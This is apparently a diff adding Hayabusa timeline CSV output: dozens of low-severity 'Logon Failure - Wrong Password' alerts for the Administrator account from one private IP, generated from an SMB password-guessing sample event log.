+2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5jNPV7ZgFExgg9n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1FJ6vm3wK97iual | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLuIx0sfF8NQD8QY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y3lMvcrrmGTkjdlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZqOabcNMeazs6TC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2AbE9D8PvuFDBz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzWdLEEc68ZvviGh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtV3BuZiljbAeikO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnKKfcwikNDdYOam | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jSbbzD7fpJY4Q1JL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gOASpLLE25ruCnGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jhUGOtszbPUwccL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yB8Mzo1RppdpLFKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOwoUlHGVeSbAhuN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BXIEHbkrjwedeaih | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OvsKoixgEzUgAyie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TzaZe6Y4Tdfjseuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEmbuU3CAC3CecZy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kfBmqmVPd0CGVUsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Uz3TlU6yrcveM1w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z6hH6AkkgBFmeZ6u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2J1W2WhA6Pj7j5j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: soHOxnkoOn7ot0My | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4c2oWI6mRIvSVSKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKsXD8aTyaC4fBqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrzji5ucmutsZNpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BApOU105FCLwj4zn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EO50f7NfrrdwwCNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PfTYbWC8IjW87th8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wLnE6zm5US4maK04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AV7taC7hYQdVjAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8MnnaSRs0bnYVlMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YgqavZ1SuNvX7RgH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IQvoIsfW0LhDit2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 33IPGQXc1MarY30J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: II4Ly9LnkWlq60Ux | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wncfJC7kDSI7O9Ud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6XzbWef3PuzQK3FJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M5670HdNC6c8O56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ea8FcddgLyV5o6oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjyhmKFdBNrHIvTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIF47pEWBMp6Nbym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6TO891WvJPkdjsct | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6cLnJYpHEzGAvhWG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gy6cFTrwrpRQFxfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gxz612Z88PMCKzAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GSPC8hibdZdyOcex | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6vlmykLeFmuhn81B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w4lEW9w53zMFPcc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jt2lDRFWwi6adwlB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G9MGvle35u5OGB5o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJgLFM2vrnKuj5N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8HRyDAzwKj9bfnA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J65LcwnRgEob9wjY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhas9e1fwDZ1Fxvt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5qJRSpjS6tZJjNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bo4HAgP2tw0GmZ4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zv0cbLCD7E05i0g5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FIKsQLk5iPyKoeqM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RiHAaBszJBGe2deQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8em4eOiqze683Cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86lXQsnn7dae93tW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Iu8olNGPmhxh6iNu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZYtN5EMHxcNqID6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mtUQGxrMoPkpUQCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYh4e3bpePhDoRwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UkC8E9uKpCgD1BHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZCDxpmDZbpGCey3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SS2dxS3WvCrAyiB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YT3VHxKNf8q14rro | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fx9HQT3u3Ig6vJ3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FukPQsr4SXRshyTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7AutKUyPELNRUcA4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 38gBkWcYdZW6Wcdz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
